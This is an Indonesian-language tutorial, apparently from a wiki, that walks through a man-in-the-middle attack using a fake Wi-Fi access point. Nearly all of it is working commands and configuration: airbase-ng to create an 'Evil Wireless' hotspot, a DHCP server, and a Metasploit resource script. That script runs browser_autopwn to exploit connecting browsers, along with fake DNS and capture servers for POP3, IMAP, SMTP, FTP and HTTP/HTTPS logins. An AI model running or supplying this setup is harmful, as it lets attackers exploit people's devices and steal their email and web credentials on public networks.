Teknik Man-in-The-Middle Attack / FakeAP

Versi Singkat membuat Fake AP

airbase-ng -e "Free WiFi" -P -C 30 -v wlan0

Versi lengkap untuk MiTM attack

Siapkan software yang di butuhkan

sudo apt-get install subversion

Summary perintah yang digunakan

svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
cd aircrack-ng/
make
make install

sudo su -
airmon-ng start wlan0
airbase-ng -e "Evil Wireless" -v mon0 &
ifconfig at0 10.0.0.1 netmask 255.255.255.0

apt-get install dhcp3-server
vi /etc/dhcp3/evil-wireless.conf

option domain-name-servers 10.0.0.1;
  
default-lease-time 60;
max-lease-time 72;
 
ddns-update-style none;
 
authoritative;
 
log-facility local7;
 
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option routers 10.0.0.1;
option domain-name-servers 10.0.0.1;
}

dhcpd3 -cf /etc/dhcp3/evil-wireless.conf

ifconfig mon0 mtu 1800
ifconfig at0 mtu 1400

svn co http://metasploit.com/svn/framework3/trunk msf3    (butuh waktu lama & bandwidth)

Menggunakan gems rupanya rewel & belum stabil :( ..

apt-get install rubygems
gem install activerecord sqlite3-ruby  (butuh waktu lama & bandwidth)

vi evilwireless.rc

load db_sqlite3
db_create /root/evilwireless.db
 
use auxiliary/server/browser_autopwn
 
setg AUTOPWN_HOST 10.0.0.1
setg AUTOPWN_PORT 55550
setg AUTOPWN_URI /ads
 
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 55550
set URIPATH /ads
 
run
 
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
 
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
 
use auxiliary/server/capture/ftp
run
 
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run
 
use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
 
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
 
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
 
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 5353
run
 
use auxiliary/server/fakedns
unset TARGETHOST
set SRVPORT 53
run

use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run
 
use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run
 
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run
 
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run 

./msfconsole -r evilwireless.rc

Referensi

• http://forums.remote-exploit.org/backtrack3-howtos/19048-rogue-accesspoint-mitm-sniffing-tutorial.html
• http://0x80.org/blog/?p=131 - The Evil Access Point
• http://forums.remote-exploit.org/wireless/23886-tutorial-how-create-fake-ap-auto-bash-script.html - How to create Face AP
• http://ww2.mastaputa.com:9999/?p=29
• http://fix-vista.com/windows-vista-installation-setup/fishing-windows-clients-with-airbase-ng-and-airchat

Pranala Menarik

• Wireless Hacking
• Wireless Internet Berbasis WiFi
• Wireless Internet
• Linux Howto